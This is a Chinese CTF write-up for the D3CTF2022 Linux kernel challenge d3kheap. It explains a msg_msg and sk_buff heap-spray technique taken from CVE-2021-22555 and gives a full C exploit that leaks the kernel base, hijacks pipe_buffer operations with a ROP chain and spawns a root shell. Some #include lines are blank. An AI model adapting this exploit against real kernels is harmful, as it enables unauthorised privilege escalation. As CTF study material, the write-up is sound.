-
【msg_msg+sk_buff】D3CTF2022-d3kheap
前言
本方法来自 CVE-2021-22555,非常漂亮的组合拳,仅仅一个 1024 的 UAF 即可提权,但是对于小堆块的 UAF 不适用。
程序分析
启动脚本如下:
- #!/bin/sh
- qemu-system-x86_64 \
- -m 256M \
- -cpu kvm64,+smep,+smap \
- -smp cores=2,threads=2 \
- -kernel bzImage \
- -initrd ./rootfs.cpio \
- -nographic \
- -monitor /dev/null \
- -snapshot \
- -append "console=ttyS0 kaslr pti=on quiet oops=panic panic=1" \
- -no-reboot \
- -s
开启了 smap、smep、kaslr、pti 保护,并且给了部分编译选项:
- Here are some kernel config options you may need
- ```
- CONFIG_STATIC_USERMODEHELPER=y
- CONFIG_STATIC_USERMODEHELPER_PATH=""
- CONFIG_SLUB=y
- CONFIG_SLAB_FREELIST_RANDOM=y
- CONFIG_SLAB_FREELIST_HARDENED=y
- CONFIG_HARDENED_USERCOPY=y
- ```
可以看到,大部分主流保护均开启。
驱动程序非常简单,这里就不看了,一个 1024 大小的 double free,只有两次释放的机会。
漏洞利用
由于这题开启了 SLAB_FREELIST_HARDENED,所以我们不能直接 double free,这里我们将其转换为一个 UAF 去进行利用。
1、将该堆块释放
2、将该堆块分配到其他结构体
3、再次将该堆块释放
通过以上 3 步,即可构造好 UAF。
接下来我们要做的就是泄漏内核基地址,劫持程序执行流。
msg_msg+sk_buff
以下将我们需要的那个 UAF 堆块称为 victim_chunk
堆喷 msg_msg 去拿到 victim_chunk
这里我们堆喷多个消息队列,每个消息队列中有两条消息,第一个为主消息,大小为 0x60;第二个为辅助消息,大小为 1024;
这里的主消息只是为了方便定位检查,其实每个消息队列中就一个 1024 的消息就行
通过堆喷,我们形成如下布局:
这里的 msg_msg_1024 拿到的就是第一步释放的 victim_chunk
堆喷 sk_buff 去拿到 victim_chunk
然后我们再利用一次释放的机会将 victim_chunk 进行释放,然后再堆喷 sk_buff 去拿到该 victim_chuk。
这里其实也可以直接用 setxattr 系统调用去进行数据篡改,但是其没有 sk_buff 好用,因为 sk_buff 可读可写,并且可以控制其释放。
但是在小堆块的时候,sk_buff 并不适用,因为 sk_buff 有个尾巴,导致其堆块大小最小为 512
通过堆喷,我们形成如下布局:
可以看到,这时我们就可以通过 sk_buff 去修改 msg_msg_1024 的头从而实现越界读和任意地址读。
那么我们该如果定位 msg_msg_1024 在那个消息队列中呢?这里比较简单,我们在堆喷 sk_buff 的时候将 msg_msg_1024 的 m_ts 字段改大,然后我们在用一个小的 bufsize 去读消息,这时候读取失败的就是我们寻找的消息,因为 msgrev 读取失败并不会 panic,而是会返回一个负数。
泄漏内核基地址和 victim_chunk 的堆地址
为什么要泄漏 victim_chunk 呢?因为最后我们要利用 pipe_buffer 去提权,到时候要让 pipe_buffer 去占用这个堆块,由于开启了 smap 保护,所以我们不能将函数表放在用户空间,而 pipe_buffer 的大小为 1024,所以我们可以直接把函数表伪造在上面,并且 msg_msg 也可以很好的帮助我们去泄漏相应地址
泄漏 victim_chunk 地址
所以我们在最开始堆喷 msg_msg 的时候,需要形成如下布局:
即我们的 msg_msg_1024 的物理相邻的下一个堆块也是一个消息,当然你可以选择下下一个,随你啦。
注意,这里 msg_msg64 不需要物理相邻
这时候我们利用 sk_buff 修改 msg_msg_1024 的 m_ts 实现任意读,这样就可以可以泄漏其对应的 msg_msg64 的地址了,然后我们在利用 sk_buff 修改 msg_msg_1024 的 next 和 m_ts 实现任意地址读,从而泄漏 nearby_msg 的地址,然后再减 0x400 就可以得到 msg_msg_1024 即 victim_chunk 的地址了。
泄漏内核基地址
这就比较简单了,我们利用 sk_buff 去修复 msg_msg_1024 消息,然后将其释放。然后再堆喷 pipe_buffer 去占据该堆块,即形成如下布局:
然后利用 sk_buff 读出 pipe_buffer 中的 anon_pipe_buf_ops 即可泄漏内核基地址。
劫持 pipe_buffer 控制程序执行流
最后就没啥了,利用 sk_buff 去写 pipe_buffer,最后打一个栈迁移就 ok 了
这 gadget 是真不好找......
exp 如下:
- #ifndef _GNU_SOURCE
- #define _GNU_SOURCE
- #endif
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- int fd;
- void add() { ioctl(fd, 0x1234); }
- void dele() { ioctl(fd, 0xDEAD); }
- void err_exit(char *msg)
- {
- printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
- sleep(5);
- exit(EXIT_FAILURE);
- }
- void info(char *msg)
- {
- printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
- }
- void line(char *msg)
- {
- printf("\033[34m\033[1m\n[*]%s\n\033[0m", msg);
- }
- void hexx(char *msg, size_t value)
- {
- printf("\033[32m\033[1m[+] %s:\033[0m %#lx\n", msg, value);
- }
- void binary_dump(char *desc, void *addr, int len) {
- uint64_t *buf64 = (uint64_t *) addr;
- uint8_t *buf8 = (uint8_t *) addr;
- if (desc != NULL) {
- printf("\033[33m[*] %s:\n\033[0m", desc);
- }
- for (int i = 0; i < len / 8; i += 4) {
- printf(" %04x", i * 8);
- for (int j = 0; j < 4; j++) {
- i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
- }
- printf(" ");
- for (int j = 0; j < 32 && j + i * 8 < len; j++) {
- printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
- }
- puts("");
- }
- }
- void get_root_shell(void)
- {
- hexx("UID", getuid());
- char* args[] = { "/bin/sh", NULL };
- execve("/bin/sh", args, NULL);
- }
- size_t user_cs, user_ss, user_rflags, user_rsp;
- void save_status()
- {
- asm volatile (
- "mov user_cs, cs;"
- "mov user_ss, ss;"
- "mov user_rsp, rsp;"
- "pushf;"
- "pop user_rflags;"
- );
- puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
- }
- void bind_core(int core)
- {
- cpu_set_t cpu_set;
- CPU_ZERO(&cpu_set);
- CPU_SET(core, &cpu_set);
- sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
- printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
- }
- struct msg_buf {
- long m_type;
- char m_text[1];
- };
- struct msg_header {
- void* l_next;
- void* l_prev;
- long m_type;
- size_t m_ts;
- void* next;
- void* security;
- };
- void fill_msg(struct msg_header* msg, void* l_next, void* l_prev, long m_type, size_t m_ts, void* next, void* security)
- {
- msg->l_next = l_next;
- msg->l_prev = l_prev;
- msg->m_type = m_type;
- msg->m_ts = m_ts;
- msg->next = next;
- msg->security = security;
- }
- #define SOCKET_NUM 16
- #define SK_BUFF_NUM 128
- int init_socket(int sk_socket[SOCKET_NUM][2])
- {
- /* socket pairs to spray sk_buff */
- for (int i = 0; i < SOCKET_NUM; i++) {
- if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_socket[i]) < 0) {
- printf("[x] failed to create no.%d socket pair!\n", i);
- return -1;
- }
- }
- return 0;
- }
- int spray_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
- {
- for (int i = 0; i < SOCKET_NUM; i++) {
- for (int j = 0; j < SK_BUFF_NUM; j++) {
- if (write(sk_socket[i][0], buf, size) < 0) {
- printf("[x] failed to spray %d sk_buff for %d socket!", j, i);
- return -1;
- }
- }
- }
- return 0;
- }
- int free_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
- {
- for (int i = 0; i < SOCKET_NUM; i++) {
- for (int j = 0; j < SK_BUFF_NUM; j++) {
- if (read(sk_socket[i][1], buf, size) < 0) {
- puts("[x] failed to received sk_buff!");
- return -1;
- }
- }
- }
- return 0;
- }
- #define MSG_QUEUE_NUM 4096
- #define PIPE_NUM 256
- #define PRIMARY_MSG_TAG 0xAAAAAAAA
- #define SECONDARY_MSG_TAG 0xBBBBBBBB
- #define PRIMARY_MSG_TYPE 0x41
- #define SECONDARY_MSG_TYPE 0x42
- #define VICTIM_MSG_TYPE 0x111
- #define ANON_PIPE_BUF_OPS 0xffffffff8203fe40
- size_t pop_rdi = 0xffffffff810938f0; // pop rdi ; ret
- size_t init_cred = 0xffffffff82c6d580;
- size_t commit_creds = 0xffffffff810d25c0;
- size_t swapgs_kpti = 0xFFFFFFFF81C01006;
- size_t push_rsi_pop_rsp_pop_4 = 0xFFFFFFFF812DBEDE;
- int main(int argc, char** argv, char** env)
- {
- bind_core(0);
- save_status();
- int qid[MSG_QUEUE_NUM];
- int sk_socket[SOCKET_NUM][2];
- int victim_id;
- int pipe_fd[PIPE_NUM][2];
- struct msg_buf* msg_msg;
- size_t l_next;
- size_t l_prev;
- size_t uaf_addr;
- size_t kernel_offset;
- char message[0x2000];
- char sk_msg[1024-320];
- if (init_socket(sk_socket) == -1) err_exit("init_sockets");
- fd = open("/dev/d3kheap", O_RDONLY);
- if (fd < 0) err_exit("open /dev/d3kheap");
- line("Step.I Spray primary and secondary msg_msg to get free object...");
- add();
- for (int i = 0; i < MSG_QUEUE_NUM; i++)
- if ((qid[i] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("msgget");
- for (int i = 0; i < MSG_QUEUE_NUM; i++)
- {
- msg_msg = (struct msg_buf*)message;
- msg_msg->m_type = PRIMARY_MSG_TYPE;
- *(int*)&msg_msg->m_text[0] = PRIMARY_MSG_TAG;
- if (msgsnd(qid[i], msg_msg, 0x60-0x30, 0) < 0) err_exit("primary msg msgsnd");
- msg_msg->m_type = SECONDARY_MSG_TYPE;
- *(int*)&msg_msg->m_text[0] = SECONDARY_MSG_TAG;
- if (msgsnd(qid[i], msg_msg, 1024-0x30, 0) < 0) err_exit("secondary msg msgsnd");
- if (i == MSG_QUEUE_NUM/2) dele();
- }
- line("Step.II Spray sk_buff to get UAF object...");
- dele();
- fill_msg((struct msg_header*)sk_msg, (void*)0xdeadbeef, (void*)0xdeadbeef, 1, 1024, (void*)0, (void*)0);
- if (spray_sk_buff(sk_socket, sk_msg, sizeof(sk_msg)) < 0) err_exit("spray sk_buff to get UAF object");
- puts("Find out the victim msg_msg idx...");
- victim_id = -1;
- for (int i = 0; i < MSG_QUEUE_NUM; i++)
- {
- if (msgrcv(qid[i], message, 1024-0x30, 1, MSG_COPY|IPC_NOWAIT) < 0)
- {
- victim_id = i;
- break;
- }
- }
- if (victim_id == -1) err_exit("Failed to find out victim msg_msg idx");
- hexx("victim_id", victim_id);
- line("Step.III Leak the victim msg_msg heap addr...");
- if (free_sk_buff(sk_socket, sk_msg, sizeof(sk_msg)) < 0) err_exit("free sk_buff");
- fill_msg((struct msg_header*)sk_msg, (void*)0xdeadbeef, (void*)0xdeadbeef, VICTIM_MSG_TYPE, 0x1000-0x30, (void*)0, (void*)0);
- if (spray_sk_buff(sk_socket, sk_msg, sizeof(sk_msg)) < 0) err_exit("spray sk_buff to get UAF object");
- if (msgrcv(qid[victim_id], message, 0x1000-0x30, 1, MSG_COPY|IPC_NOWAIT) < 0) err_exit("OOB the next nearby secondary msg_msg");
- if (*(int*)(message+8+1024) != SECONDARY_MSG_TAG) err_exit("Failed to OOB the next nearby secondary msg_msg");
- binary_dump("OOB secondary msg_msg data", message+8+1024-0x30, 0x100);
- l_next = ((struct msg_header*)(message+8+1024-0x30))->l_next;
- l_prev = ((struct msg_header*)(message+8+1024-0x30))->l_prev;
- hexx("secondary nearby msg_queue heap addr", l_next);
- hexx("secondary nearby primary msg heap addr", l_prev);
- if (free_sk_buff(sk_socket, sk_msg, sizeof(sk_msg)) < 0) err_exit("free sk_buff");
- fill_msg((struct msg_header*)sk_msg, (void*)0xdeadbeef, (void*)0xdeadbeef, VICTIM_MSG_TYPE, 0x1400, (void*)(l_prev-8), (void*)0);
- if (spray_sk_buff(sk_socket, sk_msg, sizeof(sk_msg)) < 0) err_exit("spray sk_buff to get UAF object");
- if (msgrcv(qid[victim_id], message, 0x1400, 1, MSG_COPY|IPC_NOWAIT) < 0) err_exit("ARB the next nearby primary msg_msg");
- if (*(int*)(message+8+0x1000) != PRIMARY_MSG_TAG) err_exit("Failed to ARB the next nearby primary msg_msg");
- binary_dump("ARB secondary msg_msg data", message+8+0x1000-0x30, 0x100);
- l_next = ((struct msg_header*)(message+8+0x1000-0x30))->l_next;
- l_prev = ((struct msg_header*)(message+8+0x1000-0x30))->l_prev;
- uaf_addr = l_next - 0x400;
- hexx("secondary nearby msg_msg heap addr", l_next);
- hexx("secondary nearby msg_queue heap addr", l_prev);
- hexx("victim object heap addr", uaf_addr);
- line("Step.IV Fix the victim msg_msg and Spray pipe_buffer to get the UAF object...");
- if (free_sk_buff(sk_socket, sk_msg, sizeof(sk_msg)) < 0) err_exit("free sk_buff");
- fill_msg((struct msg_header*)sk_msg, (void*)(uaf_addr+0x800), (void*)(uaf_addr+0x800), VICTIM_MSG_TYPE, 1024-0x30, (void*)(0), (void*)0);
- if (spray_sk_buff(sk_socket, sk_msg, sizeof(sk_msg)) < 0) err_exit("spray sk_buff to get UAF object");
- if (msgrcv(qid[victim_id], message, 1024-0x30, VICTIM_MSG_TYPE, 0) < 0) err_exit("Free the victim msg_msg");
- for (int i = 0; i < PIPE_NUM; i++)
- {
- if (pipe(pipe_fd[i]) < 0) err_exit("create pipe");
- if (write(pipe_fd[i][1], "pwn", 3) < 0) err_exit("write pipe");
- }
- info(" leak kernel_offset");
- kernel_offset = -1;
- for (int i = 0; i < SOCKET_NUM; i++)
- {
- for (int j = 0; j < SK_BUFF_NUM; j++)
- {
- if (read(sk_socket[i][1], sk_msg, sizeof(sk_msg)) < 0) err_exit("read sk_socket");
- if (((*(size_t*)(sk_msg+0x10))&0xfff) == 0xe40) kernel_offset = (*(size_t*)(sk_msg+0x10)) - ANON_PIPE_BUF_OPS;
- }
- }
- if (kernel_offset == -1) err_exit("Failed to leak kernel_offset");
- hexx("kernel_offset", kernel_offset);
- line("Step.V Hijack the pipe_buffer->pipe_buf_operations->release...");
- size_t rop[] = {
- 0,
- 0,
- uaf_addr+0x20,
- 0,
- pop_rdi+kernel_offset,
- push_rsi_pop_rsp_pop_4+kernel_offset,
- pop_rdi+kernel_offset,
- init_cred+kernel_offset,
- commit_creds+kernel_offset,
- swapgs_kpti+kernel_offset,
- 0,
- 0,
- get_root_shell,
- user_cs,
- user_rflags,
- user_rsp,
- user_ss
- };
- memcpy(sk_msg, rop, sizeof(rop));
- if (spray_sk_buff(sk_socket, sk_msg, sizeof(sk_msg)) < 0) err_exit("spray sk_buff to get UAF object");
- for (int i = 0; i < PIPE_NUM; i++)
- {
- close(pipe_fd[i][1]);
- close(pipe_fd[i][0]);
- }
- info("End!");
- return 0;
- }
最后运行即可可以成功提权
-
相关阅读:
Django视图(三)
JVM 垃圾回收
shiro安全框架的学习笔记
java面试(网络)
若依框架导出下载pdf/excel以及导入打印等
elenium定位element-plus框架渲染之后的页面
Scala系列-4、scala中特质、柯里化、闭包等
1. yolo 前置知识
C++实现查询本机信息并且上报
Win11的22H2依然没有WSA(Windows Subsystem for Android)?
- 原文地址:https://blog.csdn.net/qq_61670993/article/details/133634864
